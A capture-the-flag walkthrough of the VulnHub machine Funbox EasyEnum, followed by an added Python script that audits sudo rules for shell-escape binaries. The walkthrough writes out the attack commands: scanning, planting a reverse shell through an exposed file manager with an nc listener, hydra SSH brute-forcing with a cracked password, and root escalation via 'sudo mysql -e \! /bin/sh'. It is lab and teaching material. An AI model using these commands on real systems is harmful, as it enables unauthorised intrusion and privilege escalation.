Machine Link : https://www.vulnhub.com/entry/funbox-easyenum,565/

STEP01
arp-scan -l

FINDING
192.168.31.172
--------------------------------------------------------------------------------
STEP02
nmap -sSV -A -Pn 192.168.31.172

FINDING
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
--------------------------------------------------------------------------------
STEP03
gobuster dir -u http://192.168.31.172 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt

FINDING
/.php (Status: 403) [Size: 279]
/javascript (Status: 301) [Size: 321] [--> http://192.168.31.172/javascript/]
/mini.php (Status: 200) [Size: 4443]
/robots.txt (Status: 200) [Size: 21]
/secret (Status: 301) [Size: 317] [--> http://192.168.31.172/secret/]
/phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.31.172/phpmyadmin/]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 661680 / 661683 (100.00%)
--------------------------------------------------------------------------------
STEP04
http://192.168.31.172/mini.php?

FINDING
You will see a list of files, including mini.php itself.
To the right of the mini.php entry, select "edit" from the drop-down list and press the button on the right to edit the file.
Paste in reverse shell code and hit the Go button at the bottom (this might take more than one try).
Open nc -nvlp 1234 in a new terminal and get the reverse shell.
--------------------------------------------------------------------------------
STEP05
cd /home

FINDING
drwxr-xr-x 4 goat goat 4096 Sep 19 2020 goat
drwxr-xr-x 2 harry harry 4096 Sep 19 2020 harry
drwxr-xr-x 4 karla karla 4096 Sep 18 2020 karla
drwxr-xr-x 2 oracle oracle 4096 Sep 18 2020 oracle
drwxr-xr-x 2 sally sally 4096 Sep 19 2020 sally
--------------------------------------------------------------------------------
STEP06
Paste the users into a file and brute-force with hydra to get the ssh password.
hydra -L /root/Desktop/dc9users.txt -P /usr/share/wordlists/rockyou.txt -s 22 192.168.31.172 ssh

FINDING
[22][ssh] host: 192.168.31.172 login: goat password: thebest
--------------------------------------------------------------------------------
STEP07
In the reverse shell terminal:
su goat
password : thebest
--------------------------------------------------------------------------------
STEP08
goat@funbox7:/home/karla$ sudo -l

FINDING
(root) NOPASSWD: /usr/bin/mysql
--------------------------------------------------------------------------------
STEP09
https://gtfobins.github.io/gtfobins/mysql/#shell

FINDING
mysql -e \! /bin/sh
--------------------------------------------------------------------------------
STEP10
sudo -u root /usr/bin/mysql -e \! /bin/sh
whoami
root
cd /root
ls -la
cat root.flag

...solved !
--------------------------------------------------------------------------------
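
Added example (not part of the original walkthrough): STEP08 to STEP10 work because sudo grants a binary that has a built-in shell escape, so this Python check audits sudo -l output for such rules. The escape-binary list is a constructed, non-exhaustive assumption, and only the mysql rule in the sample comes from the page.

```python
import re

# Constructed, non-exhaustive list of programs with a built-in shell escape.
# mysql is the binary from this walkthrough; the rest generalize the check.
SHELL_ESCAPE_BINS = {"mysql", "vi", "vim", "less", "more", "man", "find", "awk"}

RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*(.+)$")   # "(runas) [TAG:] cmd, cmd"
TAG_RE = re.compile(r"^([A-Z_]+):\s*")             # NOPASSWD:, SETENV:, ...

# Constructed sample in the format printed by `sudo -l`; only the mysql rule
# comes from the walkthrough, the other two rules are made up for contrast.
SAMPLE = """\
Matching Defaults entries for goat on funbox7:
    env_reset, mail_badpass

User goat may run the following commands on funbox7:
    (root) NOPASSWD: /usr/bin/mysql
    (root) /usr/bin/uptime
    (karla) NOPASSWD: /usr/bin/less /var/log/syslog
"""


def audit_sudo_rules(sudo_l_output):
    """Return one finding per rule entry that is effectively a shell."""
    findings = []
    for line in sudo_l_output.splitlines():
        rule = RULE_RE.match(line)
        if not rule:
            continue  # header and Defaults lines carry no rule
        runas, rest = rule.group(1).split(":")[0].strip(), rule.group(2)
        tags = set()
        while (tag := TAG_RE.match(rest)):  # peel off leading tags
            tags.add(tag.group(1))
            rest = rest[tag.end():]
        for cmd in (c.strip() for c in rest.split(",")):
            path = cmd.split()[0] if cmd else ""
            if cmd == "ALL":
                reason = "unrestricted command set"
            elif path.rsplit("/", 1)[-1] in SHELL_ESCAPE_BINS:
                reason = "binary has a shell escape"
            else:
                continue
            findings.append({"runas": runas, "command": path,
                             "nopasswd": "NOPASSWD" in tags, "reason": reason})
    return findings


if __name__ == "__main__":
    print(*audit_sudo_rules(SAMPLE), sep="\n")
```

A finding with runas root and nopasswd True is equivalent to passwordless root; the fix is to drop the rule or replace it with a wrapper that accepts no user-controlled arguments.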